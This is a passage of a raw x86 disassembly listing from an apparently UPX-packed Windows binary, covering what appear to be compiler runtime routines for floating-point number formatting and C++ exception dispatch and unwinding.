; CODE XREF: sub_4219D9+B3j mov eax, [esi+0Ch] inc ecx cmp byte ptr [eax], 30h jz short loc_421AD6 mov ebx, [esi+4] dec ebx jns short loc_421AA5 neg ebx mov byte ptr [ecx], 2Dh loc_421AA5: ; CODE XREF: sub_4219D9+C5j inc ecx cmp ebx, 64h jl short loc_421ABC mov eax, ebx push 64h cdq pop esi idiv esi add [ecx], al mov eax, ebx cdq idiv esi mov ebx, edx loc_421ABC: ; CODE XREF: sub_4219D9+D0j inc ecx cmp ebx, 0Ah jl short loc_421AD3 mov eax, ebx push 0Ah cdq pop esi idiv esi add [ecx], al mov eax, ebx cdq idiv esi mov ebx, edx loc_421AD3: ; CODE XREF: sub_4219D9+E7j add [ecx+1], bl loc_421AD6: ; CODE XREF: sub_4219D9+BFj mov eax, [ebp+arg_4] pop esi pop ebx pop ebp retn sub_4219D9 endp ; =============== S U B R O U T I N E ======================================= sub_421ADD proc near ; CODE XREF: sub_421C7D+13p ; sub_421CA0+1Ep var_18 = qword ptr -18h arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch cmp ds:byte_4DB9F0, 0 push ebx push ebp mov ebp, [esp+8+arg_4] push esi push edi jz short loc_421B18 mov eax, ds:dword_4DB9F4 mov ebx, [esp+10h+arg_8] mov esi, ds:dword_4DB9EC cmp eax, ebx jnz short loc_421B48 xor ecx, ecx cmp dword ptr [esi], 2Dh setz cl add ecx, eax add ecx, ebp mov eax, ecx mov byte ptr [eax], 30h and byte ptr [eax+1], 0 jmp short loc_421B48 ; --------------------------------------------------------------------------- loc_421B18: ; CODE XREF: sub_421ADD+Fj mov eax, [esp+10h+arg_0] push ecx push ecx fld qword ptr [eax] fstp [esp+18h+var_18] call sub_4245E9 mov ebx, [esp+18h+arg_8] mov esi, eax push esi mov eax, [esi+4] add eax, ebx push eax xor eax, eax cmp dword ptr [esi], 2Dh setz al add eax, ebp push eax call sub_424572 add esp, 14h loc_421B48: ; CODE XREF: sub_421ADD+22j ; sub_421ADD+39j cmp dword ptr [esi], 2Dh mov edi, ebp jnz short loc_421B56 mov byte ptr [ebp+0], 2Dh lea edi, [ebp+1] loc_421B56: ; CODE XREF: sub_421ADD+70j mov eax, [esi+4] test eax, eax jg short loc_421B6D push 1 push edi call sub_421CF1 pop ecx mov byte ptr [edi], 30h pop ecx inc edi jmp short loc_421B6F ; --------------------------------------------------------------------------- loc_421B6D: ; CODE XREF: sub_421ADD+7Ej add edi, eax loc_421B6F: ; CODE XREF: sub_421ADD+8Ej test ebx, ebx jle short loc_421BB4 push 1 push edi call sub_421CF1 mov al, byte_43CBE8 pop ecx mov [edi], al mov esi, [esi+4] inc edi pop ecx test esi, esi jge short loc_421BB4 cmp ds:byte_4DB9F0, 0 jz short loc_421B99 neg esi jmp short loc_421B9F ; --------------------------------------------------------------------------- loc_421B99: ; CODE XREF: sub_421ADD+B6j neg esi cmp ebx, esi jl short loc_421BA1 loc_421B9F: ; CODE XREF: sub_421ADD+BAj mov ebx, esi loc_421BA1: ; CODE XREF: sub_421ADD+C0j push ebx push edi call sub_421CF1 push ebx push 30h push edi call sub_41B590 add esp, 14h loc_421BB4: ; CODE XREF: sub_421ADD+94j ; sub_421ADD+ADj pop edi mov eax, ebp pop esi pop ebp pop ebx retn sub_421ADD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_421BBB proc near ; CODE XREF: sub_421CA0+34p var_14 = qword ptr -14h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push ebx push esi push edi mov edi, [ebp+arg_0] push ecx push ecx fld qword ptr [edi] fstp [esp+14h+var_14] call sub_4245E9 mov ds:dword_4DB9EC, eax mov ecx, [eax+4] dec ecx mov ebx, [ebp+arg_8] mov ds:dword_4DB9F4, ecx xor ecx, ecx cmp dword ptr [eax], 2Dh push eax push ebx setz cl add ecx, [ebp+arg_4] mov esi, ecx push esi call sub_424572 mov eax, ds:dword_4DB9EC add esp, 14h mov ecx, [eax+4] dec ecx cmp ds:dword_4DB9F4, ecx setl cl mov ds:byte_4DB9F8, cl mov eax, [eax+4] dec eax cmp eax, 0FFFFFFFCh mov ds:dword_4DB9F4, eax jl short loc_421C41 cmp eax, ebx jge short loc_421C41 test cl, cl jz short loc_421C32 loc_421C28: ; CODE XREF: sub_421BBB+72j mov al, [esi] inc esi test al, al jnz short loc_421C28 and [esi-2], al loc_421C32: ; CODE XREF: sub_421BBB+6Bj push ebx push [ebp+arg_4] push edi call sub_421C7D add esp, 0Ch jmp short loc_421C51 ; --------------------------------------------------------------------------- loc_421C41: ; CODE XREF: sub_421BBB+63j ; sub_421BBB+67j push [ebp+arg_C] push ebx push [ebp+arg_4] push edi call sub_421C56 add esp, 10h loc_421C51: ; CODE XREF: sub_421BBB+84j pop edi pop esi pop ebx pop ebp retn sub_421BBB endp ; =============== S U B R O U T I N E ======================================= sub_421C56 proc near ; CODE XREF: sub_421BBB+8Ep arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h push [esp+arg_C] mov ds:byte_4DB9F0, 1 push [esp+4+arg_8] push [esp+8+arg_4] push [esp+0Ch+arg_0] call sub_4219D9 and ds:byte_4DB9F0, 0 add esp, 10h retn sub_421C56 endp ; =============== S U B R O U T I N E ======================================= sub_421C7D proc near ; CODE XREF: sub_421BBB+7Cp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push [esp+arg_8] mov ds:byte_4DB9F0, 1 push [esp+4+arg_4] push [esp+8+arg_0] call sub_421ADD and ds:byte_4DB9F0, 0 add esp, 0Ch retn sub_421C7D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_421CA0 proc near ; CODE XREF: sub_41F69F+3AAp ; DATA XREF: sub_41C760o ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp cmp [ebp+arg_8], 65h jz short loc_421CDB cmp [ebp+arg_8], 45h jz short loc_421CDB cmp [ebp+arg_8], 66h jnz short loc_421CC8 push [ebp+arg_C] push [ebp+arg_4] push [ebp+arg_0] call sub_421ADD add esp, 0Ch pop ebp retn ; --------------------------------------------------------------------------- loc_421CC8: ; CODE XREF: sub_421CA0+13j push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_4] push [ebp+arg_0] call sub_421BBB jmp short loc_421CEC ; --------------------------------------------------------------------------- loc_421CDB: ; CODE XREF: sub_421CA0+7j ; sub_421CA0+Dj push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_4] push [ebp+arg_0] call sub_4219D9 loc_421CEC: ; CODE XREF: sub_421CA0+39j add esp, 10h pop ebp retn sub_421CA0 endp ; =============== S U B R O U T I N E ======================================= sub_421CF1 proc near ; CODE XREF: sub_4219D9+2Cp ; sub_421ADD+83p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push edi mov edi, [esp+4+arg_4] test edi, edi jz short loc_421D14 push esi mov esi, [esp+8+arg_0] push esi call sub_41AFE0 inc eax push eax push esi add esi, edi push esi call sub_41CC90 add esp, 10h pop esi loc_421D14: ; CODE XREF: sub_421CF1+7j pop edi retn sub_421CF1 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_421D16 proc near ; CODE XREF: UPX0:0041C940p ; sub_41C9A9+1Bp ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h push ebp mov ebp, esp push esi mov esi, [ebp+arg_10] push edi mov edi, 19930520h cmp [esi], edi jz short loc_421D2C call sub_4225B2 loc_421D2C: ; CODE XREF: sub_421D16+Fj mov eax, [ebp+arg_0] test byte ptr [eax+4], 66h jz short loc_421D54 cmp dword ptr [esi+4], 0 jz short loc_421DAA cmp [ebp+arg_14], 0 jnz short loc_421DAA push 0FFFFFFFFh push esi push [ebp+arg_C] push [ebp+arg_4] call sub_42205D add esp, 10h jmp short loc_421DAA ; --------------------------------------------------------------------------- loc_421D54: ; CODE XREF: sub_421D16+1Dj cmp dword ptr [esi+0Ch], 0 jz short loc_421DAA cmp dword ptr [eax], 0E06D7363h jnz short loc_421D8E cmp [eax+14h], edi jbe short loc_421D8E mov ecx, [eax+1Ch] mov ecx, [ecx+8] test ecx, ecx jz short loc_421D8E movzx edx, byte ptr [ebp+arg_1C] push edx push [ebp+arg_18] push [ebp+arg_14] push esi push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push eax call ecx add esp, 20h jmp short loc_421DAD ; --------------------------------------------------------------------------- loc_421D8E: ; CODE XREF: sub_421D16+4Aj ; sub_421D16+4Fj ... push [ebp+arg_18] push [ebp+arg_14] push [ebp+arg_1C] push esi push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push eax call sub_421DB1 add esp, 20h loc_421DAA: ; CODE XREF: sub_421D16+23j ; sub_421D16+29j ... push 1 pop eax loc_421DAD: ; CODE XREF: sub_421D16+76j pop edi pop esi pop ebp retn sub_421D16 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_421DB1 proc near ; CODE XREF: sub_421D16+8Cp var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = byte ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h push ebp mov ebp, esp sub esp, 18h mov eax, [ebp+arg_4] and byte ptr [ebp+var_14], 0 mov eax, [eax+8] cmp eax, 0FFFFFFFFh mov [ebp+var_10], eax jl short loc_421DD1 mov ecx, [ebp+arg_10] cmp eax, [ecx+4] jl short loc_421DD6 loc_421DD1: ; CODE XREF: sub_421DB1+16j call sub_4225B2 loc_421DD6: ; CODE XREF: sub_421DB1+1Ej push ebx push esi mov esi, [ebp+arg_0] mov ebx, 0E06D7363h push edi mov edi, 19930520h cmp [esi], ebx jnz loc_421F2D cmp dword ptr [esi+10h], 3 jnz short loc_421E4A cmp [esi+14h], edi jnz short loc_421E4A cmp dword ptr [esi+1Ch], 0 jnz short loc_421E4A mov esi, ds:dword_4DB9FC test esi, esi jz loc_421F28 mov eax, ds:dword_4DBA00 push 1 push esi mov [ebp+arg_8], eax mov byte ptr [ebp+var_14], 1 call sub_424770 pop ecx test eax, eax pop ecx jnz short loc_421E2C call sub_4225B2 loc_421E2C: ; CODE XREF: sub_421DB1+74j cmp [esi], ebx jnz loc_421F2D cmp dword ptr [esi+10h], 3 jnz short loc_421E4A cmp [esi+14h], edi jnz short loc_421E4A cmp dword ptr [esi+1Ch], 0 jnz short loc_421E4A call sub_4225B2 loc_421E4A: ; CODE XREF: sub_421DB1+41j ; sub_421DB1+46j ... cmp [esi], ebx jnz loc_421F2D cmp dword ptr [esi+10h], 3 jnz loc_421F2D cmp [esi+14h], edi jnz loc_421F2D mov edi, [ebp+var_10] lea eax, [ebp+var_18] push eax lea eax, [ebp+var_4] push eax push edi push [ebp+arg_18] push [ebp+arg_10] call sub_41CAF7 add esp, 14h mov ebx, eax loc_421E81: ; CODE XREF: sub_421DB1+162j mov eax, [ebp+var_4] cmp eax, [ebp+var_18] jnb loc_421F18 cmp [ebx], edi jg short loc_421F0D cmp edi, [ebx+4] jg short loc_421F0D mov eax, [ebx+10h] mov [ebp+arg_0], eax mov eax, [ebx+0Ch] test eax, eax mov [ebp+var_C], eax jle short loc_421F0A loc_421EA6: ; CODE XREF: sub_421DB1+131j mov eax, [esi+1Ch] mov eax, [eax+0Ch] lea edi, [eax+4] mov eax, [eax] test eax, eax mov [ebp+var_8], eax jle short loc_421ED7 loc_421EB8: ; CODE XREF: sub_421DB1+124j push dword ptr [esi+1Ch] push dword ptr [edi] push [ebp+arg_0] call sub_422000 add esp, 0Ch test eax, eax jnz short loc_421EE6 dec [ebp+var_8] add edi, 4 cmp [ebp+var_8], eax jg short loc_421EB8 loc_421ED7: ; CODE XREF: sub_421DB1+105j dec [ebp+var_C] add [ebp+arg_0], 10h cmp [ebp+var_C], 0 jg short loc_421EA6 jmp short loc_421F0A ; --------------------------------------------------------------------------- loc_421EE6: ; CODE XREF: sub_421DB1+119j push [ebp+var_14] push [ebp+arg_1C] push [ebp+arg_18] push ebx push dword ptr [edi] push [ebp+arg_0] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push esi call sub_422111 add esp, 2Ch loc_421F0A: ; CODE XREF: sub_421DB1+F3j ; sub_421DB1+133j mov edi, [ebp+var_10] loc_421F0D: ; CODE XREF: sub_421DB1+DEj ; sub_421DB1+E3j inc [ebp+var_4] add ebx, 14h jmp loc_421E81 ; --------------------------------------------------------------------------- loc_421F18: ; CODE XREF: sub_421DB1+D6j cmp [ebp+arg_14], 0 jz short loc_421F28 push 1 push esi call sub_422486 pop ecx pop ecx loc_421F28: ; CODE XREF: sub_421DB1+56j ; sub_421DB1+16Bj ... pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_421F2D: ; CODE XREF: sub_421DB1+37j ; sub_421DB1+7Dj ... cmp [ebp+arg_14], 0 jnz short loc_421F53 push [ebp+arg_1C] push [ebp+arg_18] push [ebp+var_10] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push esi call sub_421F58 add esp, 20h jmp short loc_421F28 ; --------------------------------------------------------------------------- loc_421F53: ; CODE XREF: sub_421DB1+180j jmp sub_42255C sub_421DB1 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_421F58 proc near ; CODE XREF: sub_421DB1+198p var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h push ebp mov ebp, esp push ecx push ecx cmp ds:dword_4DBA04, 0 push esi push edi jz short loc_421F89 push [ebp+arg_1C] push [ebp+arg_18] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call sub_41C9CE add esp, 1Ch test eax, eax jnz short loc_421FFC loc_421F89: ; CODE XREF: sub_421F58+Ej mov edi, [ebp+arg_14] lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax push edi push [ebp+arg_18] push [ebp+arg_10] call sub_41CAF7 add esp, 14h mov esi, eax loc_421FA5: ; CODE XREF: sub_421F58+A2j mov eax, [ebp+var_4] cmp eax, [ebp+var_8] jnb short loc_421FFC cmp edi, [esi] jl short loc_421FF4 cmp edi, [esi+4] jg short loc_421FF4 mov eax, [esi+0Ch] mov ecx, [esi+10h] shl eax, 4 add eax, ecx mov ecx, [eax-0Ch] test ecx, ecx jz short loc_421FCE cmp byte ptr [ecx+8], 0 jnz short loc_421FF4 loc_421FCE: ; CODE XREF: sub_421F58+6Ej push 1 add eax, 0FFFFFFF0h push [ebp+arg_1C] push [ebp+arg_18] push esi push 0 push eax push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call sub_422111 add esp, 2Ch loc_421FF4: ; CODE XREF: sub_421F58+57j ; sub_421F58+5Cj ... inc [ebp+var_4] add esi, 14h jmp short loc_421FA5 ; --------------------------------------------------------------------------- loc_421FFC: ; CODE XREF: sub_421F58+2Fj ; sub_421F58+53j pop edi pop esi leave retn sub_421F58 endp ; =============== S U B R O U T I N E ======================================= sub_422000 proc near ; CODE XREF: sub_421DB1+10Fp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push esi push edi mov edi, [esp+8+arg_0] mov eax, [edi+4] test eax, eax jz short loc_422057 cmp byte ptr [eax+8], 0 lea edx, [eax+8] jz short loc_422057 mov esi, [esp+8+arg_4] mov ecx, [esi+4] cmp eax, ecx jz short loc_422031 add ecx, 8 push ecx push edx call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_422053 loc_422031: ; CODE XREF: sub_422000+1Fj test byte ptr [esi], 2 jz short loc_42203B test byte ptr [edi], 8 jz short loc_422053 loc_42203B: ; CODE XREF: sub_422000+34j mov eax, [esp+8+arg_8] mov eax, [eax] test al, 1 jz short loc_42204A test byte ptr [edi], 1 jz short loc_422053 loc_42204A: ; CODE XREF: sub_422000+43j test al, 2 jz short loc_422057 test byte ptr [edi], 2 jnz short loc_422057 loc_422053: ; CODE XREF: sub_422000+2Fj ; sub_422000+39j ... xor eax, eax jmp short loc_42205A ; --------------------------------------------------------------------------- loc_422057: ; CODE XREF: sub_422000+Bj ; sub_422000+14j ... push 1 pop eax loc_42205A: ; CODE XREF: sub_422000+55j pop edi pop esi retn sub_422000 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_42205D proc near ; CODE XREF: sub_421D16+34p ; sub_422111+42p var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_4278C0 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 0Ch push ebx push esi push edi mov [ebp+var_18], esp mov ebx, [ebp+arg_0] mov esi, [ebx+8] mov [ebp+var_1C], esi mov edi, [ebp+arg_8] loc_42208F: ; CODE XREF: sub_42205D+8Aj cmp esi, [ebp+arg_C] jz short loc_4220E9 cmp esi, 0FFFFFFFFh jle short loc_42209E cmp esi, [edi+4] jl short loc_4220A3 loc_42209E: ; CODE XREF: sub_42205D+3Aj call sub_4225B2 loc_4220A3: ; CODE XREF: sub_42205D+3Fj and [ebp+var_4], 0 mov eax, [edi+8] mov eax, [eax+esi*8+4] test eax, eax jz short loc_4220BE push 103h push ebx push eax call sub_422510 loc_4220BE: ; CODE XREF: sub_42205D+53j or [ebp+var_4], 0FFFFFFFFh jmp short loc_4220DE ; --------------------------------------------------------------------------- push [ebp+var_14] call sub_4220FB pop ecx retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] or [ebp+var_4], 0FFFFFFFFh mov edi, [ebp+arg_8] mov ebx, [ebp+arg_0] mov esi, [ebp+var_1C] loc_4220DE: ; CODE XREF: sub_42205D+65j mov eax, [edi+8] mov esi, [eax+esi*8] mov [ebp+var_1C], esi jmp short loc_42208F ; --------------------------------------------------------------------------- loc_4220E9: ; CODE XREF: sub_42205D+35j mov [ebx+8], esi mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_42205D endp ; =============== S U B R O U T I N E ======================================= sub_4220FB proc near ; CODE XREF: sub_42205D+6Ap arg_0 = dword ptr 4 mov eax, [esp+arg_0] mov eax, [eax] cmp dword ptr [eax], 0E06D7363h jz short loc_42210C xor eax, eax retn ; --------------------------------------------------------------------------- loc_42210C: ; CODE XREF: sub_4220FB+Cj jmp sub_42255C sub_4220FB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_422111 proc near ; CODE XREF: sub_421DB1+151p ; sub_421F58+94p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h arg_20 = dword ptr 28h arg_24 = dword ptr 2Ch push ebp mov ebp, esp cmp [ebp+arg_18], 0 push ebx mov ebx, [ebp+arg_14] push esi push edi mov edi, [ebp+arg_4] jz short loc_422133 push [ebp+arg_18] push ebx push edi push [ebp+arg_0] call sub_4222C2 add esp, 10h loc_422133: ; CODE XREF: sub_422111+10j cmp [ebp+arg_24], 0 push [ebp+arg_0] jnz short loc_42213F push edi jmp short loc_422142 ; --------------------------------------------------------------------------- loc_42213F: ; CODE XREF: sub_422111+29j push [ebp+arg_24] loc_422142: ; CODE XREF: sub_422111+2Cj call sub_41C8D0 mov esi, [ebp+arg_1C] push dword ptr [esi] push [ebp+arg_10] push [ebp+arg_C] push edi call sub_42205D mov eax, [esi+4] push 100h push [ebp+arg_20] inc eax mov [edi+8], eax push dword ptr [ebx+0Ch] push [ebp+arg_10] push [ebp+arg_8] push edi push [ebp+arg_0] call sub_42218C add esp, 2Ch test eax, eax jz short loc_422187 push edi push eax call sub_41C88E loc_422187: ; CODE XREF: sub_422111+6Dj pop edi pop esi pop ebx pop ebp retn sub_422111 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_42218C proc near ; CODE XREF: sub_422111+63p var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_4278D0 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 1Ch push ebx push esi push edi mov [ebp+var_18], esp mov eax, [ebp+arg_10] mov [ebp+var_2C], eax xor ebx, ebx mov [ebp+var_24], ebx mov esi, [ebp+arg_4] mov ecx, [esi-4] mov [ebp+var_28], ecx mov ecx, ds:dword_4DB9FC mov [ebp+var_1C], ecx mov ecx, ds:dword_4DBA00 mov [ebp+var_20], ecx mov edi, [ebp+arg_0] mov ds:dword_4DB9FC, edi mov ecx, [ebp+arg_8] mov ds:dword_4DBA00, ecx mov [ebp+var_4], ebx mov [ebp+var_4], 1 push [ebp+arg_18] push [ebp+arg_14] push eax push [ebp+arg_C] push esi call sub_41C955 add esp, 14h mov [ebp+var_2C], eax mov [ebp+var_4], ebx or [ebp+var_4], 0FFFFFFFFh call sub_422252 mov eax, [ebp+var_2C] loc_422219: ; CODE XREF: sub_422232+16j mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_42218C endp ; =============== S U B R O U T I N E ======================================= sub_422228 proc near ; DATA XREF: UPX0:004278E0o push dword ptr [ebp-14h] call sub_422298 pop ecx retn sub_422228 endp ; =============== S U B R O U T I N E ======================================= sub_422232 proc near ; DATA XREF: UPX0:004278E4o mov esp, [ebp-18h] and dword ptr [ebp-2Ch], 0 push 0FFFFFFFFh lea eax, [ebp-10h] push eax call sub_41CBB6 pop ecx pop ecx xor eax, eax jmp short loc_422219 sub_422232 endp ; --------------------------------------------------------------------------- loc_42224A: ; DATA XREF: UPX0:004278D8o xor ebx, ebx mov esi, [ebp+0Ch] mov edi, [ebp+8] ; =============== S U B R O U T I N E ======================================= sub_422252 proc near ; CODE XREF: sub_42218C+85p mov eax, [ebp-28h] mov [esi-4], eax mov eax, [ebp-1Ch] mov ds:dword_4DB9FC, eax mov eax, [ebp-20h] mov ds:dword_4DBA00, eax cmp dword ptr [edi], 0E06D7363h jnz short locret_422297 cmp dword ptr [edi+10h], 3 jnz short locret_422297 cmp dword ptr [edi+14h], 19930520h jnz short locret_422297 cmp [ebp-24h], ebx jnz short locret_422297 cmp [ebp-2Ch], ebx jz short locret_422297 call sub_41CC1E push eax push edi call sub_422486 pop ecx pop ecx locret_422297: ; CODE XREF: sub_422252+1Cj ; sub_422252+22j ... retn sub_422252 endp ; =============== S U B R O U T I N E ======================================= sub_422298 proc near ; CODE XREF: sub_422228+3p arg_0 = dword ptr 4 mov eax, [esp+arg_0] mov eax, [eax] cmp dword ptr [eax], 0E06D7363h jnz short loc_4222BF cmp dword ptr [eax+10h], 3 jnz short loc_4222BF cmp dword ptr [eax+14h], 19930520h jnz short loc_4222BF cmp dword ptr [eax+1Ch], 0 jnz short loc_4222BF push 1 pop eax retn ; --------------------------------------------------------------------------- loc_4222BF: ; CODE XREF: sub_422298+Cj ; sub_422298+12j ... xor eax, eax retn sub_422298 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4222C2 proc near ; CODE XREF: sub_422111+1Ap var_18 = dword ptr -18h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_4278E8 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 0Ch push ebx push esi push edi mov [ebp+var_18], esp mov ecx, [ebp+arg_8] mov eax, [ecx+4] test eax, eax jz loc_42246B cmp byte ptr [eax+8], 0 jz loc_42246B mov eax, [ecx+8] test eax, eax jz loc_42246B mov edx, [ebp+arg_4] lea edi, [eax+edx+0Ch] and [ebp+var_4], 0 test byte ptr [ecx], 8 jz short loc_42235F mov esi, [ebp+arg_0] push 1 push dword ptr [esi+18h] call sub_424770 pop ecx pop ecx test eax, eax jz loc_422462 push 1 push edi call sub_42478C pop ecx pop ecx test eax, eax jz loc_422462 mov eax, [esi+18h] mov [edi], eax mov ecx, [ebp+arg_C] add ecx, 8 push ecx loc_422350: ; CODE XREF: sub_4222C2+F5j push eax call sub_4224ED pop ecx pop ecx mov [edi], eax jmp loc_422467 ; --------------------------------------------------------------------------- loc_42235F: ; CODE XREF: sub_4222C2+57j mov esi, [ebp+arg_C] test byte ptr [esi], 1 jz short loc_4223B9 mov ebx, [ebp+arg_0] push 1 push dword ptr [ebx+18h] call sub_424770 pop ecx pop ecx test eax, eax jz loc_422462 push 1 push edi call sub_42478C pop ecx pop ecx test eax, eax jz loc_422462 push dword ptr [esi+14h] push dword ptr [ebx+18h] push edi call sub_41CC90 add esp, 0Ch cmp dword ptr [esi+14h], 4 jnz loc_422467 mov eax, [edi] test eax, eax jz loc_422467 add esi, 8 push esi jmp short loc_422350 ; --------------------------------------------------------------------------- loc_4223B9: ; CODE XREF: sub_4222C2+A3j cmp dword ptr [esi+18h], 0 mov ebx, [ebp+arg_0] push 1 push dword ptr [ebx+18h] jnz short loc_422401 call sub_424770 pop ecx pop ecx test eax, eax jz loc_422462 push 1 push edi call sub_42478C pop ecx pop ecx test eax, eax jz short loc_422462 push dword ptr [esi+14h] add esi, 8 push esi push dword ptr [ebx+18h] call sub_4224ED pop ecx pop ecx push eax push edi call sub_41CC90 add esp, 0Ch jmp short loc_422467 ; --------------------------------------------------------------------------- loc_422401: ; CODE XREF: sub_4222C2+103j call sub_424770 pop ecx pop ecx test eax, eax jz short loc_422462 push 1 push edi call sub_42478C pop ecx pop ecx test eax, eax jz short loc_422462 push dword ptr [esi+18h] call sub_4247A8 pop ecx test eax, eax jz short loc_422462 test byte ptr [esi], 4 jz short loc_422448 push 1 lea eax, [esi+8] push eax push dword ptr [ebx+18h] call sub_4224ED pop ecx pop ecx push eax push dword ptr [esi+18h] push edi call sub_41C8C9 jmp short loc_422467 ; --------------------------------------------------------------------------- loc_422448: ; CODE XREF: sub_4222C2+168j lea eax, [esi+8] push eax push dword ptr [ebx+18h] call sub_4224ED pop ecx pop ecx push eax push dword ptr [esi+18h] push edi call sub_41C8C2 jmp short loc_422467 ; --------------------------------------------------------------------------- loc_422462: ; CODE XREF: sub_4222C2+6Aj ; sub_4222C2+7Cj ... call sub_4225B2 loc_422467: ; CODE XREF: sub_4222C2+98j ; sub_4222C2+E1j ... or [ebp+var_4], 0FFFFFFFFh loc_42246B: ; CODE XREF: sub_4222C2+2Ej ; sub_4222C2+38j ... mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_4222C2 endp ; --------------------------------------------------------------------------- push 1 pop eax retn ; --------------------------------------------------------------------------- mov esp, [ebp-18h] jmp sub_42255C ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_422486 proc near ; CODE XREF: sub_421DB1+170p ; sub_422252+3Ep var_18 = dword ptr -18h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_4278F8 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp push ecx push ecx push ebx push esi push edi mov [ebp+var_18], esp mov eax, [ebp+arg_0] test eax, eax jz short loc_4224CD mov ecx, [eax+1Ch] mov ecx, [ecx+4] test ecx, ecx jz short loc_4224CD and [ebp+var_4], 0 push ecx push dword ptr [eax+18h] call sub_41C8C2 or [ebp+var_4], 0FFFFFFFFh loc_4224CD: ; CODE XREF: sub_422486+2Aj ; sub_422486+34j mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_422486 endp ; --------------------------------------------------------------------------- xor eax, eax cmp [ebp+0Ch], al setnz al retn ; --------------------------------------------------------------------------- mov esp, [ebp-18h] jmp sub_42255C ; =============== S U B R O U T I N E ======================================= sub_4224ED proc near ; CODE XREF: sub_4222C2+8Fp ; sub_4222C2+12Cp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov ecx, [esp+arg_4] push esi mov esi, [esp+4+arg_0] mov eax, [ecx] mov edx, [ecx+4] add eax, esi test edx, edx jl short loc_42250E mov esi, [edx+esi] mov ecx, [ecx+8] mov ecx, [esi+ecx] add ecx, edx add eax, ecx loc_42250E: ; CODE XREF: sub_4224ED+12j pop esi retn sub_4224ED endp ; =============== S U B R O U T I N E 